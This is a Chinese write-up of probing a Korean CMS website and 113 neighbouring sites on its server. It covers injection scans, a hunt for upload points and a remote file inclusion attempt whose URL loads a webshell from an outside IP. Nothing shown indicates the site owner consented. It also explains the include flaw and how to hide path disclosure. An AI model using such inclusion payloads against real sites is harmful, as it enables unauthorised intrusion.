对韩国某CMS的一次安全检测

二、Web应用程序安全检测

1.注入测试

用阿D，NBSI等注入工具寻找注入点，没有发现。同时用手工查找，也没有找到，simeon说我的注入比较弱，看来一点不假，呵呵。

2.寻找上传点

http://www.b**.net/ez/bbs.php?table=qna&query=write发现可以发贴子，但并没有文件上传的地方。

3.旁注检测

打开http://www.myipneighbors.com/，同一服务器下一共有114个站点，都是使用相同的CMS，用明小子的DOMAIN批量检测一下注入点和上传漏洞，和预计的结果一样，也没有发现。

说明：

http://www.myipneighbors.com/ 是一个通过IP地址或者域名来获取该IP地址或者域名所在服务器中所存在的其它网站地址。它比明小子的DOMAIN能查询到更准确的数据。

4.包含漏洞检测

没办法，还是再仔细看看www.b****k.net，当浏览到http://www.b****k.net/ez/inc.php?inc=company/sub1_1，这个是不是存在包含漏洞呢？于是测试http://www.b****k.net/ez/inc.php?inc=http://116.23.82.87:81/WebShell，出现错误，如图6所示。

CMS的一次安全检测" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>

图6不能远程包含漏洞

虽然没有找到远程包含漏洞，但这里可以暴出网站的绝对路径：/home/ba****.net/public_html/ez/。

说明：

（1）包含漏洞的原因是程序员在使用涉及到的危险函数include、require、include_once和require_once时，未对传入的变时做出过滤。

（2）关于暴出网站绝对路径的修补。因include或require因为找不到包含的文件，所以会显示出错，要屏蔽掉错误显示也很简单，只要在include或require加个“@”就可以了。